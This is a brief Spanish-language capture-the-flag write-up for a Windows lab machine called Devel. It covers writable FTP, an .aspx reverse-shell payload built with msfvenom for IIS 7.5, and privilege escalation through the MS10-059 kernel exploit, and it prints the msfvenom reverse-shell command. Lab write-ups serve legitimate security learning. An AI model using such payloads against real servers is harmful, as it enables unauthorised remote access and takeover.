# Devel

### Resumen de la resolución

* Máquina con servicio FTP expuesto con permisos de escritura
* Creación de código malicioso .aspx con MSFVenom para ejecutarlo en un servidor web Microsoft IIS 7.5
* Escalada de privilegios con Kernel Exploit MS10-059 (Chimichurri)

### Habilidades adquiridas

* Al subir un binario por FTP se debe usar el comando bin para que sea interpretado como tal

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/>" %}
Repositorio WIndows Kernel Exploits
{% endembed %}

### Comandos y herramientas destacables

* Búsqueda recursiva desde Windows cmd

{% code overflow="wrap" %}

```bash
where /r c:\ iisstart.htm
```

{% endcode %}

* Reverse Shell aspx con MSFVenom

```bash
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > exploit.aspx
```

### Walkthrough en YouTube:

Pendiente